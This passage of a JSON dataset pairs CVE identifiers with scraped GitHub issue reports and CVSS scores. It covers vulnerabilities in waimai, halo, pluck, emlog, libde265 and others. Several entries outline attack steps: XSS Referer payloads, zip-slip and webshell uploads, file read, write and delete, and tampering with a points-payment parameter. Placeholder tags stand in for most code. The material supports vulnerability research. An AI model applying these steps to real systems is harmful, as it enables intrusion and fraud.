  53759. "Issue_Url_old": "https://github.com/caokang/waimai/issues/15",
  53760. "Issue_Url_new": "https://github.com/caokang/waimai/issues/15",
  53761. "Repo_new": "caokang/waimai",
  53762. "Issue_Created_At": "2019-12-07T18:45:05Z",
  53763. "description": "This is a payment logic vulnerability that can modify the value of payment. First of all, we choose to use points to exchange products. for example you want to exchange this product, you need to use NUMBERTAG points FILETAG FILETAG Then we can get the request package. FILETAG We changed the value of the parameter credit to NUMBERTAG FILETAG FILETAG We've managed to get this product for free. FILETAG",
  53764. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  53765. "severity": "HIGH",
  53766. "baseScore": 7.5,
  53767. "impactScore": 3.6,
  53768. "exploitabilityScore": 3.9
  53769. },
  53770. {
  53771. "CVE_ID": "CVE-2020-21504",
  53772. "Issue_Url_old": "https://github.com/caokang/waimai/issues/16",
  53773. "Issue_Url_new": "https://github.com/caokang/waimai/issues/16",
  53774. "Repo_new": "caokang/waimai",
  53775. "Issue_Created_At": "2019-12-08T09:45:05Z",
  53776. "description": "Three XSS vulnerabilities found in Waimai Super Cms. In waimai Super Cms master, there is an XSS vulnerability via the APITAG and PATHTAG Referer parameter, APITAG page parameter NUMBERTAG Payload: Referer: '\"> APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG FILETAG NUMBERTAG Payload: Referer: '\"> APITAG APITAG alert NUMBERTAG APITAG FILETAG FILETAG FILETAG NUMBERTAG Payload: POST APITAG HTTP NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG Trident NUMBERTAG r NUMBERTAG like Gecko Referer: URLTAG Cookie: APITAG Connection: keep alive Host: localhost Content Length NUMBERTAG Accept: / Accept Language: en US,en;q NUMBERTAG Content Type: application/x www form urlencoded FILETAG FILETAG",
  53777. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  53778. "severity": "MEDIUM",
  53779. "baseScore": 6.1,
  53780. "impactScore": 2.7,
  53781. "exploitabilityScore": 2.8
  53782. },
  53783. {
  53784. "CVE_ID": "CVE-2020-21522",
  53785. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/418",
  53786. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/418",
  53787. "Repo_new": "halo-dev/halo",
  53788. "Issue_Created_At": "2019-12-11T10:35:33Z",
  53789. "description": "A Zip Slip Directory Traversal Vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG Then start an http service and use the installation theme feature to start the installation CODETAG Then you can see that our file FILETAG is decompressed to the / tmp directory. FILETAG Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system",
  53790. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53791. "severity": "CRITICAL",
  53792. "baseScore": 9.8,
  53793. "impactScore": 5.9,
  53794. "exploitabilityScore": 3.9
  53795. },
  53796. {
  53797. "CVE_ID": "CVE-2020-21524",
  53798. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/423",
  53799. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/423",
  53800. "Repo_new": "halo-dev/halo",
  53801. "Issue_Created_At": "2019-12-11T11:44:59Z",
  53802. "description": "A XML external entity (XXE) vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG So there is a XML external entity (XXE) APITAG vulnerability can detect the intranet, read files, ddos attacks, etc. Demonstrate reading files First construct an evil xml file. When the file is parsed, read the APITAG file and put the result into the category list field. FILETAG ERRORTAG Upload this file to the system and get the file path APITAG Using the imported wordpress blog information interface to trigger a vulnerability ERRORTAG After sending the above message, you can see the contents of the APITAG file in the background classification directory. FILETAG Bug fix recommendations: APITAG (\" URLTAG \", true) ; CVETAG",
  53803. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
  53804. "severity": "CRITICAL",
  53805. "baseScore": 9.1,
  53806. "impactScore": 5.2,
  53807. "exploitabilityScore": 3.9
  53808. },
  53809. {
  53810. "CVE_ID": "CVE-2020-21525",
  53811. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/420",
  53812. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/420",
  53813. "Repo_new": "halo-dev/halo",
  53814. "Issue_Created_At": "2019-12-11T10:52:58Z",
  53815. "description": "An Arbitrary File reading in the backend(bypass the Path check). APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG So I can read any file using the following message FILETAG CODETAG",
  53816. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  53817. "severity": "HIGH",
  53818. "baseScore": 7.5,
  53819. "impactScore": 3.6,
  53820. "exploitabilityScore": 3.9
  53821. },
  53822. {
  53823. "CVE_ID": "CVE-2020-21526",
  53824. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/421",
  53825. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/421",
  53826. "Repo_new": "halo-dev/halo",
  53827. "Issue_Created_At": "2019-12-11T11:00:30Z",
  53828. "description": "An Arbitrary file writing vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply FILETAG Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files in the user directory, and finally get the permissions of the operating system",
  53829. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53830. "severity": "CRITICAL",
  53831. "baseScore": 9.8,
  53832. "impactScore": 5.9,
  53833. "exploitabilityScore": 3.9
  53834. },
  53835. {
  53836. "CVE_ID": "CVE-2020-21527",
  53837. "Issue_Url_old": "https://github.com/halo-dev/halo/issues/422",
  53838. "Issue_Url_new": "https://github.com/halo-dev/halo/issues/422",
  53839. "Repo_new": "halo-dev/halo",
  53840. "Issue_Created_At": "2019-12-11T11:06:14Z",
  53841. "description": "An Arbitrary file deletion vulnerability in the backend. APITAG I am sure I have checked x] APITAG User Guide Documentation URLTAG FILETAG x] APITAG Wiki URLTAG x] APITAG Issues URLTAG I want to apply [x] BUG feedback There is a backup function in the background. When we delete our backup files, we can delete any files on the system through directory traversal. CODETAG My backup file directory is at APITAG . The above message can delete the FILETAG file in the APITAG directory",
  53842. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N",
  53843. "severity": "HIGH",
  53844. "baseScore": 7.7,
  53845. "impactScore": 4.0,
  53846. "exploitabilityScore": 3.1
  53847. },
  53848. {
  53849. "CVE_ID": "CVE-2020-21547",
  53850. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/114",
  53851. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/114",
  53852. "Repo_new": "saitoha/libsixel",
  53853. "Issue_Created_At": "2019-12-13T13:53:59Z",
  53854. "description": "heap buffer overflow in dither_func_fs at APITAG version : img2sixel NUMBERTAG There is a heap buffer overflow in dither_func_fs at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  53855. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53856. "severity": "HIGH",
  53857. "baseScore": 8.8,
  53858. "impactScore": 5.9,
  53859. "exploitabilityScore": 2.8
  53860. },
  53861. {
  53862. "CVE_ID": "CVE-2020-21548",
  53863. "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/116",
  53864. "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/116",
  53865. "Repo_new": "saitoha/libsixel",
  53866. "Issue_Created_At": "2019-12-16T04:32:36Z",
  53867. "description": "heap buffer overflow in sixel_encode_highcolor at APITAG img2sixel NUMBERTAG There is a heap buffer overflow in sixel_encode_highcolor at APITAG please run following cmd to reproduce it. APITAG poc URLTAG ASAN LOG ERRORTAG",
  53868. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  53869. "severity": "HIGH",
  53870. "baseScore": 8.8,
  53871. "impactScore": 5.9,
  53872. "exploitabilityScore": 2.8
  53873. },
  53874. {
  53875. "CVE_ID": "CVE-2020-21564",
  53876. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/91",
  53877. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/91",
  53878. "Repo_new": "pluck-cms/pluck",
  53879. "Issue_Created_At": "2019-12-19T15:37:06Z",
  53880. "description": "Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files. Pluck NUMBERTAG admin background exists a remote command execution vulnerability when uploading files Proof step1: login > pages > manage files upload .htaccess file to turn APITAG to FILETAG FILETAG step2: throw FILETAG into trash FILETAG step3: upload shell code FILETAG ERRORTAG FILETAG step4: view FILETAG FILETAG",
  53881. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  53882. "severity": "HIGH",
  53883. "baseScore": 8.8,
  53884. "impactScore": 5.9,
  53885. "exploitabilityScore": 2.8
  53886. },
  53887. {
  53888. "CVE_ID": "CVE-2020-21564",
  53889. "Issue_Url_old": "https://github.com/pluck-cms/pluck/issues/83",
  53890. "Issue_Url_new": "https://github.com/pluck-cms/pluck/issues/83",
  53891. "Repo_new": "pluck-cms/pluck",
  53892. "Issue_Created_At": "2019-10-21T09:08:10Z",
  53893. "description": "Pluck NUMBERTAG de NUMBERTAG admin background exists a remote command execution vulnerability in the management file interface.. Upload these two files in the management file interface. FILETAG Access in FILETAG . FILETAG Successful execution. Then upload attack code. FILETAG FILETAG Successfully obtained the shell. Poc\uff1a APITAG",
  53894. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  53895. "severity": "HIGH",
  53896. "baseScore": 8.8,
  53897. "impactScore": 5.9,
  53898. "exploitabilityScore": 2.8
  53899. },
  53900. {
  53901. "CVE_ID": "CVE-2020-21572",
  53902. "Issue_Url_old": "https://github.com/trgil/gilcc/issues/1",
  53903. "Issue_Url_new": "https://github.com/trgil/gilcc/issues/1",
  53904. "Repo_new": "trgil/gilcc",
  53905. "Issue_Created_At": "2019-12-22T10:54:02Z",
  53906. "description": "out of bounds array access and bufferoverflow. hi, I find out of bounds array access and bufferoverflow in APITAG :) FILETAG",
  53907. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  53908. "severity": "HIGH",
  53909. "baseScore": 7.5,
  53910. "impactScore": 3.6,
  53911. "exploitabilityScore": 3.9
  53912. },
  53913. {
  53914. "CVE_ID": "CVE-2020-21573",
  53915. "Issue_Url_old": "https://github.com/abhijitnathwani/image-processing/issues/3",
  53916. "Issue_Url_new": "https://github.com/abhijitnathwani/image-processing/issues/3",
  53917. "Repo_new": "abhijitnathwani/image-processing",
  53918. "Issue_Created_At": "2019-12-23T07:55:31Z",
  53919. "description": "Stack exhuasted. hi, I only modified the input image file and cause stack exhausted. I think variable _buffer_ should not be defined as a local variable, but should be dynamically applied for heap space. :) FILETAG",
  53920. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53921. "severity": "MEDIUM",
  53922. "baseScore": 5.5,
  53923. "impactScore": 3.6,
  53924. "exploitabilityScore": 1.8
  53925. },
  53926. {
  53927. "CVE_ID": "CVE-2020-21574",
  53928. "Issue_Url_old": "https://github.com/YotsuyaNight/c-http/issues/1",
  53929. "Issue_Url_new": "https://github.com/yotsuyanight/c-http/issues/1",
  53930. "Repo_new": "YotsuyaNight/c-http",
  53931. "Issue_Created_At": "2019-12-24T03:22:05Z",
  53932. "description": "Buffer Overflow. Hi APITAG I am interesting in this repo, and I test the main.c with a long requrest such as( APITAG ) APITAG and serve crashed because of the buffer overflow in APITAG : CODETAG Do you have a solution for this bug? Thanks :)",
  53933. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  53934. "severity": "HIGH",
  53935. "baseScore": 7.5,
  53936. "impactScore": 3.6,
  53937. "exploitabilityScore": 3.9
  53938. },
  53939. {
  53940. "CVE_ID": "CVE-2020-21585",
  53941. "Issue_Url_old": "https://github.com/emlog/emlog/issues/54",
  53942. "Issue_Url_new": "https://github.com/emlog/emlog/issues/54",
  53943. "Repo_new": "emlog/emlog",
  53944. "Issue_Created_At": "2019-12-24T02:25:06Z",
  53945. "description": "emlog NUMBERTAG zip template getshell vulnerability. APITAG Vulnerability in PATHTAG line NUMBERTAG function APITAG $path, $type = 'tpl') { if APITAG FALSE)) { return NUMBERTAG zip = new APITAG if ( APITAG >open($zipfile) !== TRUE) { return NUMBERTAG r = explode('/', $zip APITAG NUMBERTAG dir = isset($r NUMBERTAG r NUMBERTAG switch ($type) { case 'tpl': $re = $zip APITAG . APITAG if (false === $re) return NUMBERTAG break; case 'plugin': $plugin_name = substr($dir NUMBERTAG re = $zip APITAG . $plugin_name . '.php'); //We can upload a zipfile and extract a php webshell later if (false === $re) return NUMBERTAG break; case 'backup': $sql_name = substr($dir NUMBERTAG if APITAG != 'sql') return NUMBERTAG break; case 'update': break; } if (true === APITAG APITAG { $zip APITAG return NUMBERTAG else { return NUMBERTAG POC: FILETAG We upload FILETAG which contains FILETAG Then we access FILETAG APITAG",
  53946. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  53947. "severity": "CRITICAL",
  53948. "baseScore": 9.8,
  53949. "impactScore": 5.9,
  53950. "exploitabilityScore": 3.9
  53951. },
  53952. {
  53953. "CVE_ID": "CVE-2020-21588",
  53954. "Issue_Url_old": "https://github.com/lonely-explorer/CoreFTP/issues/1",
  53955. "Issue_Url_new": "https://github.com/lonely-explorer/coreftp/issues/1",
  53956. "Repo_new": "lonely-explorer/CoreFTP",
  53957. "Issue_Created_At": "2020-02-26T13:55:40Z",
  53958. "description": "Core FTP Local DOS Vulnerability. Vulnerability in Core FTP allows a local attacker to cause the server crash. Core FTP LE ver NUMBERTAG APITAG on Windows NUMBERTAG Step APITAG python code: APITAG Step APITAG the content in FILETAG , and paste it in Setup APITAG APITAG editbox. Step APITAG OK button, which results in a crash and the server closes.",
  53959. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  53960. "severity": "MEDIUM",
  53961. "baseScore": 5.5,
  53962. "impactScore": 3.6,
  53963. "exploitabilityScore": 1.8
  53964. },
  53965. {
  53966. "CVE_ID": "CVE-2020-21590",
  53967. "Issue_Url_old": "https://github.com/wuzhicms/wuzhicms/issues/190",
  53968. "Issue_Url_new": "https://github.com/wuzhicms/wuzhicms/issues/190",
  53969. "Repo_new": "wuzhicms/wuzhicms",
  53970. "Issue_Created_At": "2020-03-15T04:29:26Z",
  53971. "description": "wuzhicms NUMBERTAG PATHTAG directory traversal vulnerability. A directory traversal vulnerability was discovered in WUZHI CMS NUMBERTAG There is a directory traversal vulnerability which allows authenticated remote attackers to list files in arbitrary directory. Vulnerability in PATHTAG ERRORTAG When APITAG is called, the transformation of input data is as follows: PATHTAG > /...// > /../ Exploit: APITAG",
  53972. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  53973. "severity": "MEDIUM",
  53974. "baseScore": 4.3,
  53975. "impactScore": 1.4,
  53976. "exploitabilityScore": 2.8
  53977. },
  53978. {
  53979. "CVE_ID": "CVE-2020-21594",
  53980. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/233",
  53981. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/233",
  53982. "Repo_new": "strukturag/libde265",
  53983. "Issue_Created_At": "2019-12-24T08:25:45Z",
  53984. "description": "heap buffer overflow in put_epel_hv_fallback when decoding file. heap buffer overflow in put_epel_hv_fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  53985. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53986. "severity": "MEDIUM",
  53987. "baseScore": 6.5,
  53988. "impactScore": 3.6,
  53989. "exploitabilityScore": 2.8
  53990. },
  53991. {
  53992. "CVE_ID": "CVE-2020-21595",
  53993. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/239",
  53994. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/239",
  53995. "Repo_new": "strukturag/libde265",
  53996. "Issue_Created_At": "2019-12-24T11:28:20Z",
  53997. "description": "heap buffer overflow in mc_luma when decoding file. heap buffer overflow in mc_luma when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  53998. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  53999. "severity": "MEDIUM",
  54000. "baseScore": 6.5,
  54001. "impactScore": 3.6,
  54002. "exploitabilityScore": 2.8
  54003. },
  54004. {
  54005. "CVE_ID": "CVE-2020-21596",
  54006. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/236",
  54007. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/236",
  54008. "Repo_new": "strukturag/libde265",
  54009. "Issue_Created_At": "2019-12-24T11:22:38Z",
  54010. "description": "global buffer overflow in decode_CABAC_bit when decoding file. global buffer overflow in decode_CABAC_bit when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54011. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54012. "severity": "MEDIUM",
  54013. "baseScore": 6.5,
  54014. "impactScore": 3.6,
  54015. "exploitabilityScore": 2.8
  54016. },
  54017. {
  54018. "CVE_ID": "CVE-2020-21597",
  54019. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/238",
  54020. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/238",
  54021. "Repo_new": "strukturag/libde265",
  54022. "Issue_Created_At": "2019-12-24T11:26:58Z",
  54023. "description": "heap buffer overflow in mc_chroma when decoding file. heap buffer overflow in mc_chroma when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54024. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54025. "severity": "MEDIUM",
  54026. "baseScore": 6.5,
  54027. "impactScore": 3.6,
  54028. "exploitabilityScore": 2.8
  54029. },
  54030. {
  54031. "CVE_ID": "CVE-2020-21598",
  54032. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/237",
  54033. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/237",
  54034. "Repo_new": "strukturag/libde265",
  54035. "Issue_Created_At": "2019-12-24T11:25:26Z",
  54036. "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54037. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  54038. "severity": "HIGH",
  54039. "baseScore": 8.8,
  54040. "impactScore": 5.9,
  54041. "exploitabilityScore": 2.8
  54042. },
  54043. {
  54044. "CVE_ID": "CVE-2020-21599",
  54045. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/235",
  54046. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/235",
  54047. "Repo_new": "strukturag/libde265",
  54048. "Issue_Created_At": "2019-12-24T11:18:40Z",
  54049. "description": "heap overflow in de NUMBERTAG image::available_zscan when decoding file. heap overflow in de NUMBERTAG image::available_zscan when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54050. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54051. "severity": "MEDIUM",
  54052. "baseScore": 6.5,
  54053. "impactScore": 3.6,
  54054. "exploitabilityScore": 2.8
  54055. },
  54056. {
  54057. "CVE_ID": "CVE-2020-21600",
  54058. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/243",
  54059. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/243",
  54060. "Repo_new": "strukturag/libde265",
  54061. "Issue_Created_At": "2019-12-24T11:35:38Z",
  54062. "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54063. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54064. "severity": "MEDIUM",
  54065. "baseScore": 6.5,
  54066. "impactScore": 3.6,
  54067. "exploitabilityScore": 2.8
  54068. },
  54069. {
  54070. "CVE_ID": "CVE-2020-21601",
  54071. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/241",
  54072. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/241",
  54073. "Repo_new": "strukturag/libde265",
  54074. "Issue_Created_At": "2019-12-24T11:32:05Z",
  54075. "description": "stack buffer overflow in put_qpel_fallback when decoding file. stack buffer overflow in put_qpel_fallback when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54076. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54077. "severity": "MEDIUM",
  54078. "baseScore": 6.5,
  54079. "impactScore": 3.6,
  54080. "exploitabilityScore": 2.8
  54081. },
  54082. {
  54083. "CVE_ID": "CVE-2020-21602",
  54084. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/242",
  54085. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/242",
  54086. "Repo_new": "strukturag/libde265",
  54087. "Issue_Created_At": "2019-12-24T11:33:52Z",
  54088. "description": "heap buffer overflow in APITAG when decoding file. heap buffer overflow in APITAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54089. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54090. "severity": "MEDIUM",
  54091. "baseScore": 6.5,
  54092. "impactScore": 3.6,
  54093. "exploitabilityScore": 2.8
  54094. },
  54095. {
  54096. "CVE_ID": "CVE-2020-21603",
  54097. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/240",
  54098. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/240",
  54099. "Repo_new": "strukturag/libde265",
  54100. "Issue_Created_At": "2019-12-24T11:29:40Z",
  54101. "description": "heap buffer overflow in put_qpel NUMBERTAG fallback NUMBERTAG when decoding file. heap buffer overflow in put_qpel NUMBERTAG fallback NUMBERTAG when decoding file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial root APITAG uname a Linux ubuntu NUMBERTAG generic APITAG Ubuntu SMP Tue Jan NUMBERTAG UTC NUMBERTAG APITAG Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54102. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54103. "severity": "MEDIUM",
  54104. "baseScore": 6.5,
  54105. "impactScore": 3.6,
  54106. "exploitabilityScore": 2.8
  54107. },
  54108. {
  54109. "CVE_ID": "CVE-2020-21604",
  54110. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/231",
  54111. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/231",
  54112. "Repo_new": "strukturag/libde265",
  54113. "Issue_Created_At": "2019-12-24T03:25:24Z",
  54114. "description": "heap buffer overflow in decode file. heap buffer overflow in decode file I found some problems during fuzzing Test Version dev version, git clone URLTAG Test Environment root APITAG lsb_release a No LSB modules are available. Distributor ID: Ubuntu Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: xenial Test Configure ./configure configure: configure: Building dec NUMBERTAG example: yes configure: Building sherlock NUMBERTAG example: no configure: Building encoder: yes configure: Test Program APITAG Asan Output ERRORTAG POC file FILETAG password: APITAG CREDIT Zhao Liang, Huawei Weiran Labs",
  54115. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  54116. "severity": "MEDIUM",
  54117. "baseScore": 6.5,
  54118. "impactScore": 3.6,
  54119. "exploitabilityScore": 2.8
  54120. },
  54121. {
  54122. "CVE_ID": "CVE-2020-21605",
  54123. "Issue_Url_old": "https://github.com/strukturag/libde265/issues/234",
  54124. "Issue_Url_new": "https://github.com/strukturag/libde265/issues/234",
  54125. "Repo_new": "strukturag/libde265",
  54126. "Issue_Created_At": "2019-12-24T11:14:43Z",
